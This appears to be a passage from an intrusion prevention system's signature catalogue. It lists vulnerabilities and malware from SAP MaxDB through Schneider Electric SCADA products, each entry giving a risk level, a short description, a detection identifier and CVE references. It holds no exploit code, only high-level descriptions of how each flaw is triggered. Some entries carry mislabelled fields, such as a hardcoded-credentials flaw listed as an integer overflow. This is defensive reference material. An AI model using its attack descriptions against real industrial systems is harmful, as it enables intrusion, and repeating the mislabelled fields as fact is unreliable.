SAP_SAP-MaxDB-Remote-Arbitrary-Commands-Execution

About this vulnerability:

A vulnerability in SAP MaxDB

Risk:

High

First detected in:

sgpkg-ips-140-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SAP MaxDB

Type:

Input Validation

Description:

A shell command injection vulnerability exists in MaxDB database service. The vulnerability can be triggered when the service processes malicious exec_sdbinfo SAP commands. An unauthenticated attacker can exploit this vulnerability by delivering a crafted request to the target host, resulting in command injection and execution with privileges of the affected MaxDB database service.

Situation:

Generic_SAP-MaxDB-Remote-Arbitrary-Commands-Execution

References:

CVE-2008-0244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0244

BID-27206
http://www.securityfocus.com/bid/27206

Sasfis-Bot

About this vulnerability:	Sasfis Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Sasish is a Trojan that opens a backdoor and installs additional malicious content on the infected machine.
Situation:	HTTP_CRL-Sasfis-Bot-Traffic File-Text_Sasfis-Bot-Traffic

Satan-Ransomware

About this vulnerability:	Satan Ransomware
Risk:	High
First detected in:	sgpkg-ips-1062-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Backdoor
Description:	Satan is a ransomware malware which spreads using EternalBlue exploit.
Situation:	HTTP_CRL-Possible-Satan-Ransomware-File-Download HTTP_CRL-Satan-Ransomware-C2-Traffic

Satel-Iberia-SenNet-Command-Injection

About this vulnerability:

A Satel Iberia SenNet Command Injection vulnerability

Risk:

High

First detected in:

sgpkg-ips-1028-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Satel Iberia

Type:

Malfunction

Description:

A vulnerability in Satel Iberia SenNet Data Logger and Electricity Meters, multiple versions, which allows remote attackers to gain full access to the system by command injection.

Situation:

Generic_CS-Satel-Iberia-SenNet-Command-Injection

References:

CVE-2017-6048
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6048

Savant-Web-Server-Overflow

About this vulnerability:

A Savant Web Server Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-797-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Savant Web Server

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Savant Web Server, version 3.1, which allows remote attackers to execute arbitrary code via a long HTTP GET request.

Situation:

HTTP_CS-Savant-Web-Server-Overflow

References:

CVE-2002-1120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1120

BID-5686
http://www.securityfocus.com/bid/5686

OSVDB-9829
http://www.osvdb.org/9829

SaveNow-Software

About this vulnerability:	SaveNow software
Risk:	Low
First detected in:	sgpkg-ips-39-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	SaveNow
Type:	Misconfiguration
Description:	SaveNow is a software that displays advertisements and may be considered unwanted software by some organizations.
Situation:	HTTP_CSH-SaveNow-Activity

SCADA-AspicManager-Denial-Of-Service

About this vulnerability:	A vulnerability in SCADA AspicManager allowing denial of service.
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	SCADA AspicManager
Type:	Malfunction
Description:	A vulnerability exists in SCADA AspicManager where an attacker can send a long HTTP response header causing a crash and the possiblility for remote code execution.
Situation:	Generic_SS-SCADA-AspicManager-Denial-Of-Service

ScadaBR-BruteForce-Password-Attack

About this vulnerability:	A bruteforce password attack on ScadaBR web-based interface
Risk:	High
First detected in:	sgpkg-ips-627-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ScadaBR
Type:	Brute Force
Description:	A brute force attack vulnerability which can lead the the remote attacker gaining credential information for the host system.
Situation:	HTTP_CRL-General-Client-Login-Attempt HTTP_CRL-General-Client-Login-Attempt

ScadaMobile-One-v2.5.2-Directory-Traversal

About this vulnerability:	A vulnerability in ScadaMobile ONE v2.5.2
Risk:	High
First detected in:	sgpkg-ips-607-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	ScadaMobile ONE v2.5.2
Type:	Malfunction
Description:	There is a directory traversal vulnerability in ScadaMobile ONE v2.5.2.
Situation:	HTTP_CSU-Multiple-Directory-Traversal-Vulnerabilities

Scadatec-Limited-Procyon-Buffer-Overflow

About this vulnerability:

Scadatec Limited Procyon Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-654-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Scadatec Procyon

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Scadatec Limited Procyon versions before 1.14 which allows remote attackers to execute arbitrary code, via a long password, triggering an out-of-bounds read or write.

Situation:

Telnet_CS-Scadatec-Limited-Procyon-Buffer-Overflow
Generic_CS-Scadatec-Limited-Procyon-Buffer-Overflow

References:

CVE-2011-3322
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3322

BID-49480
http://www.securityfocus.com/bid/49480

OSVDB-75371
http://www.osvdb.org/75371

Schneider-Electric-Apc-Easy-UPS-Online-Getmacaddressbyip-Command-Injection

About this vulnerability:

A vulnerability in Schneider Electric APC Easy UPS On-Line Software

Risk:

High

First detected in:

sgpkg-ips-1590-5242

Last changed:

sgpkg-ips-1590-5242

Platform:

Generic

Software:

Schneider Electric APC

Type:

Input Validation

Description:

A command injection vulnerability has been reported in Schneider Electric APC Easy UPS Online. The vulnerability is due to insufficient validation of user input in the getMacAddressByIP method. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary command execution under the security context of SYSTEM.

Situation:

Generic_CS-Schneider-Electric-Apc-Easy-UPS-Online-Getmacaddressbyip-Command-Injection

References:

CVE-2023-29412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29412

Schneider-Electric-C-Bus-Toolkit-Access-Save-Command-Directory-Traversal

About this vulnerability:

A vulnerability in Schneider Electric C-Bus Toolkit

Risk:

Moderate

First detected in:

sgpkg-ips-1389-5242

Last changed:

sgpkg-ips-1389-5242

Platform:

Generic

Software:

Schneider Electric C-Bus Toolkit

Type:

Directory Traversal

Description:

Improper input validation of path names in the C-Gate service causes a vulnerability in Schneider Electric C-bus toolkit. A successful exploit allows an attacker to save certain files to arbitrary paths on the target system, possibly gaining access to execute arbitrary code.

Situation:

Generic_CS-Schneider-Electric-C-Bus-Toolkit-Access-Save-Command-Directory-Traversal

References:

CVE-2021-22717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22717

Schneider-Electric-C-Bus-Toolkit-Authentication-Bypass-Vulnerability

About this vulnerability:

A vulnerability in Schneider Electric C-Bus Toolkit

Risk:

Moderate

First detected in:

sgpkg-ips-1420-5242

Last changed:

sgpkg-ips-1420-5242

Platform:

Generic

Software:

Schneider Electric C-Bus Toolkit

Type:

Insecure Configuration

Description:

A vulnerability in Schneider Electric C-Bus Toolkit, versions 1.15.8 and prior, which allows remote attackers to bypass access control policy, due to improper handling local requests in the C-Gate service.

Situation:

File-Text_Schneider-Electric-C-Bus-Toolkit-Authentication-Bypass-Vulnerability

References:

CVE-2021-22784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22784

Schneider-Electric-C-Bus-Toolkit-File-Delete-Command-Arbitrary-File-Delete

About this vulnerability:

A vulnerability in Schneider Electric C-Bus Toolkit

Risk:

Moderate

First detected in:

sgpkg-ips-1704-5242

Last changed:

sgpkg-ips-1704-5242

Platform:

Generic

Software:

Schneider Electric C-Bus Toolkit

Type:

Directory Traversal

Description:

An arbitrary file delete vulnerability has been reported in Schneider Electric C-Bus Toolkit. The vulnerability is due to improper input validation in the FILE DELETE command of the C-Gate2 service. A remote attacker could exploit the vulnerability by sending a crafted request to the target service. Successful exploitation could result in arbitrary file delete in the context as NETWORK SERVICE, which could lead to denial-of-service conditions.

Situation:

Generic_CS-Schneider-Electric-C-Bus-Toolkit-File-Delete-Command-Arbitrary-File-Delete

References:

CVE-2023-5399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5399

Schneider-Electric-C-Bus-Toolkit-File-Download-Command-Directory-Traversal

About this vulnerability:

A vulnerability in Schneider Electric C-Bus Toolkit

Risk:

Moderate

First detected in:

sgpkg-ips-1672-5242

Last changed:

sgpkg-ips-1672-5242

Platform:

Generic

Software:

Schneider Electric C-Bus Toolkit

Type:

Directory Traversal

Description:

Improper input validation in the FILE DOWNLOAD command of the C-Gate2 service causes a directory traversal vulnerability in Schneider C-Bus Toolkit. A succesful explot allows an attacker to access arbitrary files on the target system.

Situation:

Generic_CS-Schneider-Electric-C-Bus-Toolkit-File-Download-Command-Directory-Traversal

References:

CVE-2023-5399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5399

Schneider-Electric-C-Bus-Toolkit-File-Upload-Project-Name-Directory-Traversal

About this vulnerability:

A vulnerability in Schneider Electric C-Bus Toolkit

Risk:

Moderate

First detected in:

sgpkg-ips-1665-5242

Last changed:

sgpkg-ips-1665-5242

Platform:

Generic

Software:

Schneider Electric C-Bus Toolkit

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Schneider Electric C-Bus Toolkit. The vulnerability is due to improper input validation of the project name notation in the FILE UPLOAD command of the C-Gate2 service. A remote attacker could exploit the vulnerability by sending a crafted request to the target service. Successful exploitation could result in arbitrary file write under the security context as NETWORK SERVICE, which could potentially lead to the execution of arbitrary code.

Situation:

Generic_CS-Schneider-Electric-C-Bus-Toolkit-File-Upload-Project-Name-Directory-Traversal

References:

CVE-2023-5399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5399

Schneider-Electric-C-Bus-Toolkit-FILE-UPLOAD-Unrestricted-File-Upload

About this vulnerability:

A vulnerability in Schneider Electric C-Bus Toolkit.

Risk:

High

First detected in:

sgpkg-ips-1391-5242

Last changed:

sgpkg-ips-1391-5242

Platform:

Generic

Software:

Schneider Electric C-Bus Toolkit

Type:

Input Validation

Description:

A vulnerability in Schneider Electric C-Bus Toolkit, versions 1.15.7 and before, which allows remote attackers to execute arbitrary code by sending a crafted request to the target server, due to the improper input validation of the path name and input file in the C-Gate2 service.

Situation:

Generic_CS-Schneider-Electric-C-Bus-Toolkit-FILE-UPLOAD-Unrestricted-File-Upload

References:

CVE-2021-22719
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22719

Schneider-Electric-C-Bus-Toolkit-Project-Restore-Information-Disclosure

About this vulnerability:

A vulnerability in Schneider Electric C-Bus Toolkit

Risk:

Moderate

First detected in:

sgpkg-ips-1393-5242

Last changed:

sgpkg-ips-1393-5242

Platform:

Generic

Software:

Schneider Electric C-Bus Toolkit

Type:

Directory Traversal

Description:

Improper input validation of the path name in the C-Gate service causes an information disclosure vulnerability in Schneider Electric C-Bus Toolkit.

Situation:

Generic_CS-Schneider-Electric-C-Bus-Toolkit-Project-Restore-Information-Disclosure

References:

CVE-2021-22720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22720

Schneider-Electric-ClearSCADA-DoS2

About this vulnerability:	A vulnerability in Schneider Electric ClearSCADA
Risk:	High
First detected in:	sgpkg-ips-614-5211
Last changed:	sgpkg-ips-1581-5242
Platform:	Windows
Software:	Schneider Electric ClearSCADA
Type:	Malfunction
Description:	A vulnerability exists in Schneider Electric ClearScada, where an attacker could send a custom HTTP request causing a denial of service condition.
Situation:	HTTP_CSH-Schneider-Electric-ClearSCADA-DoS2

Schneider-Electric-ClearSCADA-Opf-File-Parsing-Out-Of-Bounds-Array-Indexing

About this vulnerability:

A vulnerability in Schneider Electric ClearSCADA 2010

Risk:

Moderate

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric ClearSCADA

Type:

Integer Overflow

Description:

A code execution vulnerability has been reported in Schneider Electric ClearSCADA. The vulnerability is due improper validation of a length parameter that is used to index an array in the OPF File parsing component. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious file. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.

Situation:

File-Binary_Schneider-Electric-ClearSCADA-Opf-File-Parsing-Out-Of-Bounds-Array-Indexing

References:

CVE-2014-0779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0779

OSVDB-103150
http://www.osvdb.org/103150

Schneider-Electric-Ethernet-Module-Multiple-Services-Hardcoded-Credentials

About this vulnerability:

A vulnerability in Schneider Electric Ethernet Module

Risk:

High

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric Ethernet Module

Type:

Integer Overflow

Description:

Multiple Schneider Electric Ethernet Module services use hardcoded credentials which allows attackers to trivially access the program or system and gain privileged access.

Situation:

FTP_CS-Schneider-Electric-Ethernet-Module-Hardcoded-Credentials

References:

CVE-2011-4859
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4859

BID-51605
http://www.securityfocus.com/bid/51605

OSVDB-77705
http://www.osvdb.org/77705

Schneider-Electric-Gp-Pro-EX-Parseapi-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in Schneider Electric GP-Pro EX
Risk:	Moderate
First detected in:	sgpkg-ips-744-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Schneider Electric GP-Pro EX
Type:	Buffer Overflow
Description:	A heap buffer overflow vulnerability caused by improper input validation in Schneider Electric GP-Pro EX can be exploited by means of a crafted project file to gain the ability to execute code with the privileges of the logged-on user.
Situation:	File-Binary_Schneider-Electric-Gp-Pro-EX-Parseapi-Heap-Buffer-Overflow

Schneider-Electric-IGSS-Dashboard-CVE-2023-3001-Insecure-Deserialization

About this vulnerability:

A vulnerability in Schneider Electric IGSS

Risk:

Moderate

First detected in:

sgpkg-ips-1606-5242

Last changed:

sgpkg-ips-1606-5242

Platform:

Generic

Software:

Schneider Electric IGSS

Type:

Input Validation

Description:

Insufficient validation of user-supplied dashboard files causes an insecure deserialization vulnerability in Schneider Electric IGSS. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

File-TextId_Schneider-Electric-IGSS-Dashboard-CVE-2023-3001-Insecure-Deserialization

References:

CVE-2023-3001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3001

Schneider-Electric-IGSS-DashBoard.exe-Insecure-Deserialization

About this vulnerability:

A vulnerability in Schneider Electric IGSS.

Risk:

High

First detected in:

sgpkg-ips-1578-5242

Last changed:

sgpkg-ips-1578-5242

Platform:

Generic

Software:

Schneider Electric IGSS

Type:

Input Validation

Description:

A vulnerability in Schneider Electric IGSS, versions 16.0.0.23040 and prior, which allows remote attackers to execute arbitrary code by enticing a user into opening a crafted dashboard file, due to insufficient validation of user-supplied dashboard files opened with the dashboard component of IGSS.

Situation:

File-TextId_Schneider-Electric-IGSS-DashBoard.exe-Insecure-Deserialization

References:

CVE-2023-27978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27978

Schneider-Electric-IGSS-Dc-Opcode-101-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Schneider Electric IGSS

Risk:

Moderate

First detected in:

sgpkg-ips-1440-5242

Last changed:

sgpkg-ips-1440-5242

Platform:

Generic

Software:

IGSS Server

Type:

Buffer Overflow

Description:

Improper processing of opcode 101 in the dc module causes a buffer overflow vulnerability in Schneider IGSS. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Schneider-Electric-IGSS-Dc-Opcode-101-Heap-Buffer-Overflow

References:

CVE-2021-22824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22824

Schneider-Electric-IGSS-Dc-Opcode-60-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Schneider Electric IGSS

Risk:

Moderate

First detected in:

sgpkg-ips-1443-5242

Last changed:

sgpkg-ips-1443-5242

Platform:

Generic

Software:

IGSS Server

Type:

Directory Traversal

Description:

Improper input validation when processing opcode 60 in the dc module of Schneider Electric IGSS server causes a file deletion vulnerability. A successful exploit allows an attacker to cause a denial of service condition.

Situation:

Generic_CS-Schneider-Electric-IGSS-Dc-Opcode-60-Arbitrary-File-Deletion

References:

CVE-2021-22823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22823

Schneider-Electric-IGSS-dc.exe-Opcode-60-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Schneider Electric IGSS.

Risk:

High

First detected in:

sgpkg-ips-1443-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Generic

Software:

Schneider Electric IGSS

Type:

Directory Traversal

Description:

A vulnerability in Schneider Electric IGSS, versions prior to 15.0.0.21321, which allows remote attackers to cause a denial of service condition by sending a crafted packet to the target system, due to an input validation when processing opcode 60 in dc module.

Situation:

Generic_CS-Schneider-Electric-IGSS-Dc-Opcode-60-Arbitrary-File-Deletion

References:

CVE-2021-22823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22823

Schneider-Electric-IGSS-Getrmsreportfile-Directory-Traversal

About this vulnerability:

A vulnerability in Schneider Electric IGSS

Risk:

Moderate

First detected in:

sgpkg-ips-1578-5242

Last changed:

sgpkg-ips-1578-5242

Platform:

Generic

Software:

Schneider Electric IGSS

Type:

Directory Traversal

Description:

Insufficient validation of user-supplied path in getRMSreportFile function causes a directory traversal vulnerability in Schneider Electric IGSS. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

File-Text_Schneider-Electric-IGSS-Getrmsreportfile-Directory-Traversal

References:

CVE-2023-27981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27981

Schneider-Electric-IGSS-IGSSdataServer-CVE-2022-24313-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Schneider Electric IGSS.

Risk:

High

First detected in:

sgpkg-ips-1481-5242

Last changed:

sgpkg-ips-1481-5242

Platform:

Generic

Software:

Schneider Electric IGSS

Type:

Buffer Overflow

Description:

A stack based buffer overflow vulnerability in Schneider Electric IGSS, versions prior to 15.0.0.22020, which allows remote attackers to execute arbitrary code by sending a maliciously crafted packet to the target service, due to a buffer overflow when processing messages sent to the IGSSDataServer.exe process.

Situation:

Generic_CS-Schneider-Electric-IGSS-IGSSdataServer-CVE-2022-24313-Stack-Buffer-Overflow

References:

CVE-2022-24313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24313

Schneider-Electric-IGSS-IGSSdataServer-Opcode1-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Schneider Electric IGSS

Risk:

Moderate

First detected in:

sgpkg-ips-1488-5242

Last changed:

sgpkg-ips-1488-5242

Platform:

Generic

Software:

Schneider Electric IGSS

Type:

Malfunction

Description:

Improper processing of Opcode 1 (Log) messages sent to the IGSSDataServer.exe process causes an out of bounds write vulnerability in Schneider Electric IGSS. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Schneider-Electric-IGSS-IGSSdataServer-Opcode1-Out-Of-Bounds-Write

References:

CVE-2022-32522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32522

Schneider-Electric-IGSS-IGSSdataserver.exe-Almnote-Integer-Overflow

About this vulnerability:

A vulnerability in Schneider Electric IGSS

Risk:

High

First detected in:

sgpkg-ips-1511-5242

Last changed:

sgpkg-ips-1511-5242

Platform:

Generic

Software:

Schneider Electric IGSS

Type:

Integer Overflow

Description:

An integer overflow vulnerability exists in Schneider Electric IGSS. The vulnerability is due to input validation error when processing ALMNOTE opcode. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted packet to the target service. Successful exploitation could cause denial-of-service and potentially remote code execution.

Situation:

Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-Almnote-Integer-Overflow

References:

CVE-2022-2329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2329

Schneider-Electric-IGSS-IGSSdataserver.exe-CVE-2022-24315-Out-of-Bounds-Read

About this vulnerability:

A vulnerability in Schneider Electric IGSS

Risk:

High

First detected in:

sgpkg-ips-1455-5242

Last changed:

sgpkg-ips-1455-5242

Platform:

Generic

Software:

Schneider Electric IGSS

Type:

Malfunction

Description:

An out-of-bounds read vulnerability has been reported in Schneider Electric IGSS. This vulnerability is due memory access error when processing messages sent to the IGSSdataServer.exe process. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted packet to the target service. Successful exploitation could allow the attacker to potentially cause the denial of service condition on the IGSS application.

Situation:

Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-CVE-2022-24315-Out-of-Bounds-Read

References:

CVE-2022-24315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24315

Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-5-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Schneider Electric IGSS

Risk:

High

First detected in:

sgpkg-ips-1541-5242

Last changed:

sgpkg-ips-1541-5242

Platform:

Generic

Software:

Schneider Electric IGSS

Type:

Malfunction

Description:

An out-of-bounds write vulnerability has been reported in Schneider Electric IGSS. This vulnerability is due to an out-of-bounds write when processing Opcode 5 (ONL) messages sent to the IGSSDataServer.exe process. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted packet to the target service. Successful exploitation could allow the attacker to potentially execute arbitrary code on the target system in the context of the IGSSDataServer process.

Situation:

Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-5-Out-Of-Bounds-Write

References:

CVE-2022-32524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32524

Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-6-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Schneider Electric IGSS

Risk:

High

First detected in:

sgpkg-ips-1541-5242

Last changed:

sgpkg-ips-1541-5242

Platform:

Generic

Software:

Schneider Electric IGSS

Type:

Malfunction

Description:

An out-of-bounds write vulnerability has been reported in Schneider Electric IGSS. This vulnerability is due to an out-of-bounds write when processing Opcode 6 (HDM) messages sent to the IGSSDataServer.exe process. A remote, unauthenticated attacker could exploit this vulnerability by sending maliciously crafted packets to the target service. Successful exploitation could allow the attacker to potentially execute arbitrary code on the target system in the context of the IGSSDataServer process.

Situation:

Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-6-Out-Of-Bounds-Write

References:

CVE-2022-32525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32525

Schneider-Electric-IGSS-IGSSupdateservice-Directory-Traversal

About this vulnerability:

A vulnerability in Schneider Electric IGSS

Risk:

Moderate

First detected in:

sgpkg-ips-1242-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IGSS Server

Type:

Directory Traversal

Description:

Improper handling of user-supplied paths in the IGSSupdateservice service causes a directory traversal vulnerability in Schneider Electric IGSS. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Schneider-Electric-IGSS-IGSSupdateservice-Directory-Traversal

References:

CVE-2020-7478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7478

Schneider-Electric-IGSS-Opcode2-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Schneider Electric IGSS

Risk:

Moderate

First detected in:

sgpkg-ips-1525-5242

Last changed:

sgpkg-ips-1525-5242

Platform:

Generic

Software:

Schneider Electric IGSS

Type:

Malfunction

Description:

An out-of-bounds write when processing Opcode 2 (BCL) messages sent to the IGSSdataServer.exe process causes a vulnerability in Schneider IGSS. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

Generic_CS-Schneider-Electric-IGSS-Opcode2-Out-Of-Bounds-Write

References:

CVE-2022-32523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32523

Schneider-Electric-Iiot-Monitor-Downloadcsv-Directory-Traversal

About this vulnerability:

A vulnerability in Schneider Electric IIoT Monitor

Risk:

Moderate

First detected in:

sgpkg-ips-1148-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric

Type:

Directory Traversal

Description:

There has been reported a directory traversal vulnerability in Schneider Electric IIoT. This vulnerability can be exploited remotely. Successful exploitation might lead in disclosure of file contents.

Situation:

HTTP_CSU-Schneider-Electric-Iiot-Monitor-Downloadcsv-Directory-Traversal

References:

CVE-2018-7835
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7835

Schneider-Electric-Indusoft-Web-Studio-Remote-Agent-Remote-Code-Execution

About this vulnerability:

A Schneider Electric InduSoft Web Studio Remote Agent Remote Code Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric

Type:

Misconfiguration

Description:

A vulnerability in Schneider Electric InduSoft Web Studio which allows remote attackers to execute arbitrary code due to the lack of authentication to the Remote Agent Service.

Situation:

Generic_CS-Schneider-Electric-Indusoft-Web-Studio-Remote-Agent-Remote-Code-Execution

References:

CVE-2015-7374
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7374

Schneider-Electric-Indusoft-Web-Studio-Remote-Code-Execution-CVE-2018-8840

About this vulnerability:

A vulnerability in Schneider Electric InduSoft Web Studio

Risk:

High

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

Schneider Electric

Type:

Buffer Overflow

Description:

A stack buffer overflow in InduSoft Web Studio v8.1 and earlier allows unauthenticated remote code execution. InTouch Machine Edition 2017 v8.1 and earlier are also impacted by this vulnerability.

Situation:

Generic_CS-Schneider-Electric-Indusoft-Web-Studio-Remote-Code-Execution-CVE-2018-8840

References:

CVE-2018-8840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8840

Schneider-Electric-Interactive-Graphical-SCADA-System-Buffer-Overflow

About this vulnerability:

A vulnerability in Interactive Graphical SCADA Systems

Risk:

High

First detected in:

sgpkg-ips-1326-5242

Last changed:

sgpkg-ips-1326-5242

Platform:

Generic

Software:

7T Interactive Graphical SCADA System

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability Schneider Electric Interactive Graphical SCADA Systems, versions 9.x and 10.x, which allows remote attackers to execute arbitrary code due to an integer underflow that leads to a stack buffer overflow when processing specially crafted input sent to ports tcp/12397 and tcp/12399.

Situation:

Generic_CS-Schneider-Electric-Interactive-Graphical-SCADA-System-Buffer-Overflow

References:

CVE-2013-0657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0657

Schneider-Electric-Isobjectmodel-Removeparameter-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Schneider Electric SoMachine

Risk:

Moderate

First detected in:

sgpkg-ips-632-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in multiple Schneider Electric products. The vulnerability is due to a stack buffer overflow in the RemoveParameter() method of the IsObjectModel.ModelObject.1 ActiveX control in isObjectModel.dll. A remote unauthenticated attacker could exploit this vulnerability by enticing a target user to open a crafted web page. Successful exploitation could lead to arbitrary code execution in the context of the browser process.

Situation:

File-Text_Schneider-Electric-Isobjectmodel-Removeparameter-Stack-Buffer-Overflow

References:

CVE-2014-9200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9200

BID-72335
http://www.securityfocus.com/bid/72335

OSVDB-117017
http://www.osvdb.org/117017

Schneider-Electric-Modicon-M340-Buffer-Overflow-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-715-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric Modicon M340

Type:

Input Validation

Description:

There is a buffer overflow vulnerability in Schneider Electric Modicon M340 product line. A remote attacker can exploit this vulnerability by sending a malformed HTTP request to the vulnerable device. Successful exploitation can result in remote code execution or in a denial of service.

Situation:

HTTP_CSH-Schneider-Electric-Modicon-M340-Buffer-Overflow-Vulnerability

References:

CVE-2015-7937
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7937

Schneider-Electric-Pelco-DS-nvs-Rvctl.rvcontrol.1-Buffer-Overflow

About this vulnerability:

A vulnerability in Schneider Electric Pelco DS-NVs

Risk:

Moderate

First detected in:

sgpkg-ips-636-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric Pelco DS-NVs

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Schneider Electric Pelco DS-NV Software package. The vulnerability is due to insufficient input validation on a user-supplied input in the SetText method before it is copied into a fixed length buffer on stack. A remote unauthenticated attacker can exploit this vulnerability by enticing the victim to open a file or visit a webpage. Successful exploitation could lead to code execution in the security context of the browser process.

Situation:

File-Text_Schneider-Electric-Pelco-DS-nvs-Rvctl.rvcontrol.1-Buffer-Overflow

References:

CVE-2015-0982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0982

OSVDB-119304
http://www.osvdb.org/119304

Schneider-Electric-Pelco-Endura-Encoder

About this vulnerability:

A vulnerability in Schneider Electric Pelco Endura

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Schneider Electric

Type:

Insecure Configuration

Description:

A vulnerability in Schneider Electric Pelco Endura NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 version encoders prior to version 2.1.9.7 which allows remote attackers to enable the SSH service and change the root password.

Situation:

HTTP_CRL-Schneider-Electric-Pelco-Endura-Encoder

References:

CVE-2019-6814
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6814

